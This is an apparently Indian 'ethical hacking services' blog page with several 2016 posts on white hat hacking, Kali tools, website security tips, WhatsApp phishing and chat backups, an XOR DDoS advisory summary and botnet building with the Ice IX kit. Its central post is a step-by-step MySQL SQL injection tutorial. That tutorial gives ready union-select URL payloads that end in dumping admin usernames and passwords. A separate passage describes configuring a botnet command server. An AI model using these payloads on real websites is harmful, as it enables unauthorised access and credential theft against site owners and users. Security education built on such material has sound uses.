Sunday, 5 June 2016

White Hat Hacker

What does White Hat Hacker mean?

A white hat hacker is a computer security specialist who breaks into protected systems and networks to test and asses their security. White hat hackers use their skills to improve security by exposing vulnerabilities before malicious hackers (known as black hat hackers) can detect and exploit them. Although the methods used are similar, if not identical, to those employed by malicious hackers, white hat hackers have permission to employ them against the organization that has hired them.

Hacking for Good

Hats off to the white hats. These hackers, who break into computer networks and digital devices to find holes before the bad guys do, have led to some of the most significant advances in securing the online world. Their findings have reshaped the way e-mail accounts, credit card numbers, and even ATMs and medical devices are protected from cyber-criminals.

With the annual Black Hat and DefCon hacker conferences in Las Vegas starting up in August, Bloomberg is revisiting some of the biggest showstoppers by some of the white-hat community's most elite stars. Based on the following examples, you'll be relieved to know that these hackers are on our side.


We Provide Services On Following Cities

*Ethical Haker in Ludhiana

*Ethical Hacking Services in Ludhiana

*Ethical Hacking Services in Mumbai

*Ethical Hacking Services in Delhi

*Ethical Hacking Services in Gujarat

* Ethical Hacking Services in Chandigarh

Website HackingTricks

SQL Injection in MySQL Databases:-
SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database.

Step 1:

When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:
www.site.com/page=1
or
www.site.com/id=5
Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example:
www.site.com/page=1'
If the database is vulnerable, the page will spit out a MySQL error such as;
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29
If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.

Step 2

Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example:
www.site.com/page=1 order by 1--
http://www.site.com/page=1 order by 2--
http://www.site.com/page=1 order by 3--
http://www.site.com/page=1 order by 4--
http://www.site.com/page=1 order by 5--
If we receive another MySQL error here, then that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used.

Step 3

We now are going to use the "union" command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--,
for example:
www.site.com/page=1 union all select 1,2,3,4--
This is what we would enter if we have 4 columns. If you have 7 columns you would put,union all select 1,2,3,4,5,6,7-- If this is done successfully the page should show a couple of numbers somewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable.
Step 4
We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:
user()
database()
version()
or if these dont work try...
@@user
@@version
@@database
For example the url would look like:
www.site.com/page=1 union all select 1,user(),version(),4--
The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.
IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.

Step 5

In this step our aim is to list all the table names in the database. To do this we enter the following command after the url.
UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
So the url would look like:
www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables.

Step 6

In this Step we want to list all the column names in the database, to do this we use the following command:
union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password.

Step 7

Finally we need to dump the data, so say we want to get the "username" and "password" fields, from table "admin" we would use the following command,
union all select 1,2,group_concat(username,0x3a,password),4 from admin--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--
Here the "concat" command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website

 

We Provide Services On Following Cities

*Ethical Haker in Ludhiana
*Ethical Hacking Services in Ludhiana
*Ethical Hacking Services in Mumbai
*Ethical Hacking Services in Delhi
*Ethical Hacking Services in Gujarat
* Ethical Hacking Services in Chandigarh

Kali linux Toolkit

Top 10 Security Tools

  1. Information Gathering
  2. Vulnerability Analysis
  3. Web Applications
  4. Password Attacks
  5. Wireless Attacks
  6. Exploitation Tools
  7. Sniffing/Spoofing
  8. Maintaining Access
  9. Reverse Engineering
  10. Stress Testing
  11. Hardware Hacking
  12. Forensics
  13. Reporting Tools
  14. System Services
Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. Since there is no patch for human stupidity, this is why social engineering seems the biggest weapon for hackers. When social engineering toolkit combine with Armitage and metasploit then it can do wonders, you can test the security by hacking into Windows, Facebook and other OS and even web application.

We Provide Services On Following Cities

*Ethical Haker in Ludhiana

*Ethical Hacking Services in Ludhiana

*Ethical Hacking Services in Mumbai

*Ethical Hacking Services in Delhi

*Ethical Hacking Services in Gujarat

* Ethical Hacking Services in Chandigarh

Sunday, 24 January 2016

Security tips to protect your website from hackers

websites

1 Always Update Website !

Most hacking these days is entirely automated, with bots constantly scanning every site they can looking for exploitation opportunities. It is not good enough to update once a month or even once a week.

2 – Use Strong Passwords For Your Websites

I often need to log in to their site/server using their admin user details. I am frequently disturbed by how insecure their root passwords are. It is a little scary that I have to say this, but admin/admin is not a secure username and password combination.
  1. COMPLEX: Passwords should be random.
  2. LONG: Passwords should be 12+ characters long.
  3. UNIQUE: Do not reuse passwords!

3 – One Site = One Container

Not only can this result in all your sites being hacked at the same time, it also makes the cleanup process much more time consuming and difficult. The infected sites can continue to reinfect one another in an endless loop.

4 – Sensible User Access

Once you have separate user accounts for every user, you can keep an eye on user behavior by reviewing logs and knowing the usual behavior (when and where they normally access the website) so you can spot anomalies and confirm with the person that their account hasn’t been compromised.

5 – Change the Default Settings IF You use CMS!

It is usually easiest to change these default details when installing your CMS, but they can be changed later.

7 – Backups

Making backups of your website is very important, but storing these backups on your web server is a major security risk. These backups invariably contain unpatched versions of your CMS and extensions which are publicly available, giving hackers easy access to your server.

8 – Server Configuration Files

You should really get to know your web server configuration files. Apache web servers use the .htaccessfile,

9 – Install SSL

I’m actually of two minds as to whether or not to include this point because there have been so many articles incorrectly stating that installing SSL will solve all your security issues. SSL does nothing to protect your site against any malicious attacks, or stop it from distributing malware. SSL encrypts communications between Point A and Point B – the website server and browser. This encryption is important for one specific reason: it prevents anyone from being able to intercept that traffic, known as a Man in the Middle (MITM) attack.

10 – File Permissions

  • Read‘ (4): View the file contents.
  • Write‘ (2): Change the file contents.
  • Execute‘ (1): Run the program file or script.

Saturday, 16 January 2016

whatsapp forensics

wattsapp
The maximum users of smartphone they use free mobile messaging app WhatsApp. But what frequent WhatsApp chatters might not know is that there is an app out there that is designed to specifically steal the private chat conversations of users and that it can be a serious security threat to mobile phones. Which could allow hackers to trick users into downloading malware on their PCs. More than 900 million people use WhatsApp on a regular basis.
  • Security firm Comodo Labs discovered a new malware attack that targets businesses and consumers who use the application. The phishing scheme attempts to convince users to click on links that hit their email disguised as an official email from the company.
  • Hackers are using various subject lines to convince you to click on the contents of the email, such as “You have obtained a voice notification xgod,” or “A brief audio recording has been delivered! Jsvk.” The body of the email contains imagery and text to convince you the email is from WhatsApp (see image below), but you shouldn’t click on it. Better yet, report the message as spam as soon as you see it.
You should remember that your smartphone number is what identifies you in the WhatsApp network, so the company would have no reason to send you emails about anything. Moreover, your friends and family will send you pictures and audio recordings directly inside WhatsApp, and notifications will appear directly on the screen. No email is involved whatsoever. The second threat you should know about involves emojis. A teenage hacker discovered that by entering thousands of emojis into a message, the app can be crashed both on the web and on mobile.

How do I move my chat history over to my new Android phone?

Transferring via local backup

Quick steps
  1. Back up your chats on your old phone.
    • Go to WhatsApp > Menu Button > Settings > Chats and calls > Back up chats.
  2. Transfer your external SD card to your new phone if your WhatsApp/Database folder is located in your external SD card.
    • Please see the detailed steps section below if your WhatsApp folder is located in your device's internal memory.
  3. Install WhatsApp on your new phone.
  4. Verify the same phone number in WhatsApp that you had when you backed up your chats.
  5. Click Restore when prompted to restore your message history.
Detailed steps
To transfer local backup from one Android phone to another, please follow these steps:
  1. To start, manually back up your most recent chats.
    • Go to WhatsApp > Menu Button > Settings > Chats and calls > Back up chats.
  2. Next, transfer this backup to your new Android phone.
    • If your phone has an external SD card, take the SD card out of your old phone, and put it into your new one.
    • For phones that have an internal memory or internal SD card (like most Samsung devices), you will need to transfer the /sdcard/WhatsApp/ folder from your old phone to the same folder on your new phone. There are a couple of ways you can do this. You can use a file explorer or even transfer the backup files to your computer.
    • Please note that it is possible to be missing some files during the transfer. Please double check to make sure all the files you wish to transfer over to your new phone are included in the backup.
    • If you are unsure about what kind of SD card you have, we recommend checking your phone's specifications on your phone manufacturer's website.
  3. Once you have safely transferred your backup, you can install WhatsApp on your new Android phone.
  4. During the installation process, WhatsApp will automatically find your backup and ask you if you would like to restore it. Once restored, your old chats will appear on your new phone.

Transferring via Google Drive

  1. Manually back up your chats to Google Drive on your old phone.
    • Go to WhatsApp > Menu Button > Settings > Chats and calls > Chat backupBack Up.
  2. Add the same Google account to the new phone that was used to perform the backup on your old phone. Also make sure you are using the same phone number in the new phone.
  3. Install WhatsApp on your new phone.
  4. After verifying the same phone number used to perform the backup on the old phone, you will be prompted to restore your messages and media from Google Drive.
  5. After the restoration process is complete, tap on Next and your chats will be displayed once initialization is complete.
  6. After restoring your chats, WhatsApp will begin restoring your media files.
You can transfer your chat history over to your new Android phone by transferring your local backup or restoring your backup from Google Drive. Local backup refers to the automatic backup of your chat history to your phone's WhatsApp folder that occurs daily every 2AM. This folder is located in your device's internal memory or external SD card. Google Drive backup, if activated, refers to the saving of your messages and media to your personal Google Drive account. Why Are WhatsApp Artifacts Important to Your Mobile Forensics Investigations? Much like other mobile chat applications, WhatsApp contacts, messages, and attachments can be valuable to examiners looking to recover evidence for a variety of different investigation types. Whether you’re analysing the mobile device of a suspect or a victim, these chat artifacts can contain valuable information to help solve a case.
Andriller - Android Forensic Tools:-Andriller - is software utility with a collection of forensic tools for smartphones. It performs read-only, forensically sound, non-destructive acquisition from Android devices. It has other features, such as powerful Lock screen cracking for Pattern, PIN code, or Password; custom decoders for Apps data from Android (and some Apple iOS) databases for decoding communications. Extraction and decoders produce reports in HTML and Excel (.xlsx) formats.

Tuesday, 12 January 2016

XOR DDoS

013

What is XOR DDoS?

XOR DDoS is a Trojan malware that infects Linux systems, instructing them to launch DDoS attacks on demand by a remote attacker. Initially, attackers gain access by brute force attacks to discover the password to Secure Shell services on a Linux machine. Once login has been acquired, the attackers use root privileges to run a Bash shell script that downloads and executes the malicious binary.

“Over the past year, the XOR DDoS botnet has grown and is now capable of being used to launch huge DDoS attacks,” said Stuart Scholly, senior vice president and general manager, Security Business Unit, Akamai. “XOR DDoS is an example of attackers switching focus and building botnets using compromised Linux systems to launch DDoS attacks. This happens much more frequently now than in the past, when Windows machines were the primary targets forDDoS malware.”

XOR DDoS Denial of Service Attacks

Researcher showed that the bandwidth of DDoS attacks coming from the XOR DDoS botnet ranged from low, single-digit Gbps to 150+ Gbps – an extremely large attack size. The most frequent target was the gaming sector, followed by educational institutions. The botnet attacks up to 20 targets per day, 90% of which were in Asia. Of the DDoS attacks from the XOR DDoS botnet Akamai has mitigated, several examples documented on August 22-23 are profiled in the threat advisory. One of the attacks was nearly 179 Gbps, and the other was almost 109 Gpbs. Two attack vectors were observed: SYN and DNS floods.

The IP address of the bot is sometimes spoofed, but not always. The attacks observed in the DDoS campaigns against Akamai customers were a mix of spoofed and non-spoofed attack traffic. Spoofed IP addresses are generated such that they appear to come from the same /24 or /16 address space as the infected host. A spoofing technique where only the third or fourth octet of the IP address is altered is used to prevent Internet Service Providers (ISPs) from blocking the spoofed traffic on Unicast Reverse Path Forwarding (uRPF)-protected networks.

DDoS mitigation of XOR DDoS attacks

Identifiable static characteristics were observed, including initial TTL value, TCP window size, and TCP header options. Payload signatures such as these can aid in DDoS mitigation. These are available in the threat advisory. In addition, tcpdump filters are provided to match SYN flood attack traffic generated by this botnet.

How to detect and remove XOR DDoS malware

The presence of XOR DDoS can be detected in two ways. To detect this botnet in a network, look for communications between a bot and its C2 using a Snort rule provided in the advisory. To detect infection of this malware on a Linux host, the advisory includes a YARA rule that pattern matches strings observed in the binary.

XOR DDoS is persistent – it runs processes that will reinstall the malicious files if they are deleted. Therefore removing the XOR DDoS malware is a four-step process for which several scripts are provided in the advisory:

  1. Identify the malicious files in two directories.
  2. Identify the processes that promote persistence of the main process.
  3. Kill the malicious processes.
  4. Delete the malicious files.

Akamai continues to monitor ongoing campaigns using XOR DDoS to launch DDoS attacks. To learn more about the threat, malware removal and DDoS mitigation techniques, please download a complimentary copy of the threat advisory at www.stateoftheinternet.com/xorddos.

Monday, 11 January 2016

botnet
Botnet also Known as zombie army
What is Botnet??
The word Botnet is formed from the words ‘robot’ and ‘network’. Cybercriminals use special Trojan viruses to breach the security of several users’ computers, take control of each computer, and organize all of the infected machines into a network of ‘bots’ that the criminal can remotely manage.A botnet is a number of Internet-connected computers communicating with other similar machines in an effort to complete repetitive tasks and objectives. This can be as mundane as keeping control of an Internet Relay Chat (IRC) channel, or it could be used to send spam email or participate in distributed denial-of-service attacks. The word botnet is a combination of the words robot and network. The term is usually used with a negative or malicious connotation.
Types of botnets
  • Legal botnets
  • Illegal botnets
Any such computer is referred to as a zombie - in effect, a computer "robot" or "bot" that serves the wishes of some master spam or virus originator. Most computers compromised in this way are home-based. According to a report from Russian-based Kaspersky Labs, botnets -- not spam, viruses, or worms -- currently pose the biggest threat to the Internet. A report from Symantec came to a similar conclusion.
How To Build A Botnet
Opening his browser, Mullis searched for a botnet builder tool for malware known as Ice IX. Google's top response to his particular query—which I'm not going to reveal here—yielded a site that offered the tool for free. Ice IX is a nasty little piece of malware that injects a fake Facebook page into a victim's browser that collects credit card information under false pretenses.
Any malware, though, would have done just as well. Using methods and tools that can be found online in minutes, a botnet creator can create a central command and control server and then use social engineering to inject malware onto the victim's computer—by, say, emailing an innocuous looking but disguised file, or tricking a user into downloading the file from a compromised website.
After downloading and installing the Ice IX kit software, Mullis started up its bot builder kit and began to set up the parameters for the malware—specifying, for instance, how often the malware would communicate with the command server, what actions it would undertake and even how it would hide from anti-virus scans. Much of this work was simply a matter of filling in appropriate fields in the Ice IX builder kit's straightforward Windows interface.
Some of the rest required editing the Ice IX kit's powerful setup.txt script. Individual command lines in that script might direct the malware to take screenshots of pages that were visited by the zombie machine's browser on a certain domain, such as a bank web site. Or have the malware tell the zombie machine's browser to block sites (such as anti-virus updating sites) altogether. It can also redirect legitimate site URLs to malevolent sites intended to collect critical information—credit card numbers, Social Security numbers, passwords. You name it.
Once he'd set the malware's specifications, including the location of its controlling command server, Mullis uploaded Ice IX-produced files to his LAMP server. And presto—he had a fully configured botnet command server.